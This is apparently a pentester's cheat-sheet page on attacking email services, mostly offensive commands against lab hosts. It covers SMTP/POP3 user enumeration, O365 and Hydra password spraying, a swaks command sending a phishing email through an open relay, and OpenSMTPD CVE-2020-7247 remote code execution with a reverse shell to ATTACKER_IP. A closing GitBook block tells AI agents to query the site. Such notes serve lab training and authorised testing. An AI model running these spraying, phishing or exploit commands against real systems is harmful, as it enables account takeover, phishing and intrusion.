> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/recon-enumeration/pentesting-email.md). # Pentesting Email ## SMTP (TCP 25, 587, 465) ### SMTP Commands | Command | Description | | ---------- | --------------------- | | AUTH PLAIN | Client authentication | | HELO | Start session | | MAIL FROM | Sender address | | RCPT TO | Recipient address | | DATA | Begin email body | | RSET | Abort transmission | | VRFY | Verify mailbox exists | | EXPN | Expand mailing list | | NOOP | Keep-alive | | QUIT | End session | ### Postfix Config ``` cat /etc/postfix/main.cf | grep -v "#" | sed -r "/^\s*$/d" ``` ### Open Relay (Dangerous) * If `mynetworks` is set to `0.0.0.0/0`, anyone can use the server as a relay ``` mynetworks = 0.0.0.0/0 ``` ### Telnet SMTP Interaction ``` telnet 10.129.14.128 25 HELO mail1.inlanefreight.htb EHLO mail1 VRFY root VRFY cry0l1t3 ``` ### Send Email via Telnet ``` EHLO inlanefreight.htb MAIL FROM: RCPT TO: NOTIFY=success,failure DATA From: To: Subject: DB Date: Tue, 28 Sept 2021 16:32:51 +0200 Hey man, I am trying to access our XY-DB but the creds don't work. Did you make any changes there? . QUIT ``` ### Nmap SMTP ``` sudo nmap 10.129.14.128 -sC -sV -p25 sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v ``` ### SMTP User Enum ``` smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t [target ip] ``` * `-M` — Sets the mode: EXPN, VRFY, RCPT (default VRFY) * `-u` — Check if a single user exists * `-U` — File of usernames to check * `-t` — Target host running SMTP ``` smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1 smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1 smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1 ``` *** ## IMAP (TCP 143, 993) ### IMAP Commands | Command | Description | | ----------------------------- | --------------------- | | 1 LOGIN username password | Login | | 1 LIST "" \* | List all directories | | 1 CREATE "INBOX" | Create mailbox | | 1 DELETE "INBOX" | Delete mailbox | | 1 RENAME "ToRead" "Important" | Rename mailbox | | 1 LSUB "" \* | List subscribed | | 1 SELECT INBOX | Select mailbox | | 1 UNSELECT INBOX | Exit mailbox | | 1 FETCH \ all | Retrieve message data | | 1 CLOSE | Remove deleted | | 1 LOGOUT | Close connection | ### cURL IMAP ``` curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd curl -k 'imaps://10.129.14.128' --user cry0l1t3:1234 -v ``` ### OpenSSL Interaction ``` openssl s_client -connect 10.129.14.128:pop3s openssl s_client -connect 10.129.14.128:imaps ``` *** ## POP3 (TCP 110, 995) ### POP3 Commands | Command | Description | | ------------- | ------------------------- | | USER username | Identify user | | PASS password | Authenticate | | STAT | Number of emails | | LIST | List all emails with size | | RETR id | Retrieve email by ID | | DELE id | Delete email by ID | | CAPA | Server capabilities | | RSET | Reset | | QUIT | Close connection | ### POP3 via Telnet ``` telnet 10.10.10.10 110 USER PASS LIST RETR 1 RETR 2 ``` *** ## Dovecot Dangerous Settings | Setting | Description | | ------------------------- | --------------------------- | | auth\_debug | All auth debug logging | | auth\_debug\_passwords | Log submitted passwords | | auth\_verbose | Log failed auth | | auth\_verbose\_passwords | Log auth passwords | | auth\_anonymous\_username | Username for ANONYMOUS SASL | *** ## Nmap All Email Protocols ``` sudo nmap 10.129.14.128 -sV -p110,143,993,995 -sC ``` *** ## Email Port Reference | Port | Service | | ------- | ----------------------- | | TCP/25 | SMTP Unencrypted | | TCP/143 | IMAP4 Unencrypted | | TCP/110 | POP3 Unencrypted | | TCP/465 | SMTP Encrypted | | TCP/587 | SMTP Encrypted/STARTTLS | | TCP/993 | IMAP4 Encrypted | | TCP/995 | POP3 Encrypted | *** ## MX Record Enumeration ```bash host -t MX hackthebox.eu host -t MX microsoft.com dig mx plaintext.do | grep "MX" | grep -v ";" dig mx inlanefreight.com | grep "MX" | grep -v ";" ``` Resolve the mail server: ```bash host -t A mail1.inlanefreight.htb. ``` Full Nmap email scan: ```bash sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128 ``` *** ## SMTP User Enumeration (Telnet) ### VRFY ``` telnet 10.10.110.20 25 VRFY root VRFY www-data VRFY new-user ``` ### EXPN ``` telnet 10.10.110.20 25 EXPN john EXPN support-team ``` ### RCPT TO ``` telnet 10.10.110.20 25 MAIL FROM:test@htb.com RCPT TO:julio RCPT TO:kate RCPT TO:john ``` ### POP3 USER Enumeration ``` telnet 10.10.110.20 110 USER julio USER john ``` *** ## smtp-user-enum ```bash smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 ``` Modes: `-M VRFY`, `-M EXPN`, `-M RCPT` *** ## O365 Enumeration & Spraying ### Validate O365 Domain ```bash python3 o365spray.py --validate --domain msplaintext.xyz ``` ### Enumerate Users ```bash python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz ``` ### Password Spray ```bash python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz ``` *** ## Hydra POP3 Password Spray ```bash hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 ``` *** ## Open Relay Exploitation Detect with Nmap: ```bash nmap -p25 -Pn --script smtp-open-relay 10.10.11.213 ``` Send phishing email via open relay with swaks: ```bash swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213 ``` *** ## OpenSMTPD RCE (CVE-2020-7247) * Affects OpenSMTPD up to version 6.6.2 * Unauthenticated RCE via semicolon injection in the sender email address field * 64-character command limit * Exploit: * Confirm execution with ICMP before trying for a shell: ```bash sudo tcpdump -i tun0 icmp python3 exploit.py HOSTNAME 25 'ping -c 4 ATTACKER_IP' ``` * A valid local recipient may be required for reverse-shell exploit tooling. If accepted by the server, `root@HOSTNAME` can work: ```bash nc -nlvp 80 python3 exploit.py HOSTNAME 25 'root@HOSTNAME' ATTACKER_IP 80 ``` See [OpenSMTPD](/things-i-have-pwnd-before/opensmtpd.md). *** ## Evolution Email Client ```bash sudo apt-get install evolution ``` GUI client supporting IMAP, SMTP, POP3 — useful for interacting with mailboxes after obtaining credentials. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-email.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.